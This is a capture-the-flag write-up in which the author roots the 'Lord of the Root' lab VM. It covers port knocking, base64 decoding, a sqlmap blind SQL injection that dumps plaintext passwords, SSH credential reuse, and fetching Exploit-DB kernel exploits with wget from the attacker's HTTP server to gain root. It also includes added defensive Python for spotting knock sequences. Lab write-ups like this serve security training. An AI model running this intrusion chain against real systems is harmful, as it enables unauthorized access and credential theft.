Welcome to the Lord of the Root CTF, created by Kooksec and stumbled through by me.
Ok, first things first, the chocolate starfish is my man Fred Durst. Let's get an IP with netdiscover.
Once we have that, let's run a full scan on it with nmap:
nmap -A -sS -sV -p 1-65535 -T4 192.168.128.20
Ok, so not much really going on, just port 22 for SSH.
root@kali:~# nmap -A -sS -sV -p 1-65535 -T4 192.168.128.20
Starting Nmap 7.60 ( https://nmap.org ) at 2018-11-29 05:33 EST
Nmap scan report for 192.168.128.20
Host is up (0.00042s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|   256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_  256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (EdDSA)
MAC Address: 08:00:27:AC:E1:23 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's try SSHing to that port and see what happens. I'm going to provide a screenshot because there is some baller ASCII art on this page that doesn't format correctly.
root@kali:~# ssh 192.168.128.20
The authenticity of host '192.168.128.20 (192.168.128.20)' can't be established.
ECDSA key fingerprint is SHA256:XzDLUMxo8ifHi4SciYJYj702X3PfFwaXyKOS07b6xd8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.128.20' (ECDSA) to the list of known hosts.
Easy as 1,2,3
firstname.lastname@example.org's password:
This looks like port knocking, which is a security-through-obscurity method: you use ports as a sort of combination lock, and connecting to certain ports in a particular order unlocks a hidden service/port.
I ran the commands below, then read the rest of the article and realized I could have scripted it, so, RTFM kids.
root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 1 192.168.128.20 #knocking port 1
root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 2 192.168.128.20 #knocking port 2
root@kali:~# nmap -Pn --host_timeout 201 --max-retries 0 -p 3 192.168.128.20 #knocking port 3
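Seen from the other side of the firewall, that same 1,2,3 sequence is what a defender would look for in the logs. The following is an added example (my code, not the CTF's or its author's) that replays constructed iptables-style log lines through a small knock-sequence state machine, with an assumed 10-second window, and reports which sources completed the knock in order:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

KNOCK_SEQUENCE = [1, 2, 3]           # the ordered knock the page describes
SEQ_TIMEOUT = timedelta(seconds=10)  # assumed window for completing the whole sequence

# Constructed firewall log lines (iptables-style LOG fields behind an ISO timestamp), not captured from the box.
LOG_LINES = """
2018-11-29T05:40:01 KNOCK IN=eth0 SRC=192.168.128.10 DST=192.168.128.20 PROTO=TCP DPT=1
2018-11-29T05:40:02 KNOCK IN=eth0 SRC=192.168.128.10 DST=192.168.128.20 PROTO=TCP DPT=2
2018-11-29T05:40:03 KNOCK IN=eth0 SRC=192.168.128.10 DST=192.168.128.20 PROTO=TCP DPT=3
2018-11-29T05:41:10 KNOCK IN=eth0 SRC=192.168.128.77 DST=192.168.128.20 PROTO=TCP DPT=1
2018-11-29T05:41:11 KNOCK IN=eth0 SRC=192.168.128.77 DST=192.168.128.20 PROTO=TCP DPT=3
2018-11-29T05:41:12 KNOCK IN=eth0 SRC=192.168.128.77 DST=192.168.128.20 PROTO=TCP DPT=2
2018-11-29T05:42:00 KNOCK IN=eth0 SRC=192.168.128.99 DST=192.168.128.20 PROTO=TCP DPT=1
2018-11-29T05:42:01 KNOCK IN=eth0 SRC=192.168.128.99 DST=192.168.128.20 PROTO=TCP DPT=2
2018-11-29T05:42:30 KNOCK IN=eth0 SRC=192.168.128.99 DST=192.168.128.20 PROTO=TCP DPT=3
""".strip().splitlines()

LINE_RE = re.compile(r"^(\S+) .*SRC=(\S+) .*DPT=(\d+)")


def find_knockers(lines: List[str]) -> Dict[str, List[str]]:
    """Map each source IP to the timestamps at which it completed the knock sequence."""
    # A knock on the wrong port resets that source's progress (as knockd does), and an
    # attempt that takes longer than SEQ_TIMEOUT is discarded.
    progress: Dict[str, int] = defaultdict(int)   # next expected index per source
    started: Dict[str, datetime] = {}             # when the current attempt began
    completed: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, src, port = m.group(1), m.group(2), int(m.group(3))
        ts = datetime.fromisoformat(stamp)
        if src in started and ts - started[src] > SEQ_TIMEOUT:
            progress[src] = 0                     # attempt expired, start over
        if port == KNOCK_SEQUENCE[progress[src]]:
            if progress[src] == 0:
                started[src] = ts
            progress[src] += 1
            if progress[src] == len(KNOCK_SEQUENCE):
                completed[src].append(stamp)
                progress[src] = 0
        else:
            progress[src] = 0                     # wrong port: sequence resets
    return dict(completed)
```

Only 192.168.128.10 completes the sequence in the sample: .77 knocks out of order and .99 lets the window expire before its third knock.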
After re-scanning I can see there is another port open! An Apache web server on port 1337:
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
I navigate there and success! Found a webpage.
Lmao. Ok, let's try /robots.txt and /index; it's the same page, so let's inspect it.
I found this in the page source, which looks like a base64 encoded string:
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh-->
</html>
So let's decode it with an online decoder, because echo x | base64 -d didn't work.
Amazing, ok, that also looks like a base64 encoded string, and this time the command worked, so that's something to look into later..
root@kali:~# echo Lzk3ODM0NTIxMC9pbmRleC5waHA= | base64 -d
/978345210/index.php
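The string is base64 two layers deep, and the outer layer carries trailing text that is not base64 at all. As an added example (my code, not the author's), this pulls the comment out of a constructed copy of the page source and strictly peels it layer by layer, stopping once the remaining text no longer decodes as valid base64:

```python
import base64
import binascii
import re
from typing import List, Optional

# Constructed copy of the page source shown above; the comment body is the encoded string
# the page found, the surrounding markup is reproduced so the comment extractor has input.
PAGE_SOURCE = """<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh-->
</html>"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")   # candidate base64 runs, 8+ chars


def extract_comments(html: str) -> List[str]:
    """Return the stripped bodies of every HTML comment in the document."""
    return [body.strip() for body in COMMENT_RE.findall(html)]


def decode_once(token: str) -> Optional[str]:
    """Strictly decode one base64 token (adding any missing padding); None unless it is
    valid base64 that decodes to printable text."""
    padded = token + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def peel_base64(text: str, max_depth: int = 5) -> List[str]:
    """Repeatedly decode the first base64-looking token in the current layer, returning
    every layer from the original string down to the innermost decodable one."""
    layers = [text]
    for _ in range(max_depth):
        candidates = map(decode_once, B64_TOKEN_RE.findall(layers[-1]))
        decoded = next((d for d in candidates if d is not None), None)
        if decoded is None:          # nothing left that is genuinely base64
            break
        layers.append(decoded)
    return layers


def hidden_paths(html: str) -> List[List[str]]:
    """Peel every comment in the page; each result is the chain of decoded layers."""
    return [peel_base64(c) for c in extract_comments(html)]
```

The middle layer is the "Lzk3...= Closer!" string the online decoder showed, and the digit run "978345210" in the final path is correctly rejected rather than decoded a third time.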
Jackpot, a login page.
Ok, so this looks like it's vulnerable to SQL injection.
I opened Burp Suite to intercept a request, and then using the sqlmap wizard entered the following:
root@kali:~# sqlmap --wizard
[07:02:26] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.128.20:1337/978345210/index.php
POST data (--data) [Enter for None]: username=test&password=password&submit=+Login+
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 2
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 3
This ran and identified that the database was vulnerable to a time-based blind attack, which then ran and found the following user credentials:
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+
Logging in with any of these credentials yields the same (slightly less hilarious each time) meme account page.
But! Let's try those same login credentials on the SSH server…
Frodo did not work, but smeagol got us SSHed into the box, along with some more baller-ass ASCII art.
Doing some basic Linux recon, I used uname -a to find out what version it's running; it looks like it's a version of Linux I've already privilege escalated on, which is handy.
I found the same privilege escalation exploit here and started a SimpleHTTPServer in my home directory with Python, then used wget to transfer it to the /tmp folder on the target.
root@kali:~# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.128.20 - - [07/Dec/2018 02:02:28] "GET /37292.c HTTP/1.1" 200 -

smeagol@LordOfTheRoot:/var/tmp$ wget http://192.168.128.10:8000/37292.c
--2018-12-04 20:17:31--  http://192.168.128.10:8000/37292.c
Connecting to 192.168.128.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: ‘37292.c’

100%[================================================================================================>] 5,119       --.-K/s   in 0s

2018-12-04 20:17:31 (666 MB/s) - ‘37292.c’ saved [5119/5119]

smeagol@LordOfTheRoot:/var/tmp$
After this I compile and execute it. However, it failed..
smeagol@LordOfTheRoot:/var/tmp$ gcc 37292.c -o pwned
smeagol@LordOfTheRoot:/var/tmp$ ./pwned
spawning threads
mount #1
mount #2
child threads done
exploit failed
smeagol@LordOfTheRoot:/var/tmp$ whoami
smeagol
I jumped back on Exploit-DB and eventually found another exploit.
smeagol@LordOfTheRoot:/var/tmp$ gcc 39166.c -o pwn
smeagol@LordOfTheRoot:/var/tmp$ ./pwn
root@LordOfTheRoot:/var/tmp# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
This time it executed fine and gave me root access! After navigating to the root folder I found the final flag.
root@LordOfTheRoot:~/Documents# cd /root
root@LordOfTheRoot:/root# pwd
/root
root@LordOfTheRoot:/root# ls
buf  buf.c  Flag.txt  other  other.c  switcher.py
root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.” – Gandalf
root@LordOfTheRoot:/root#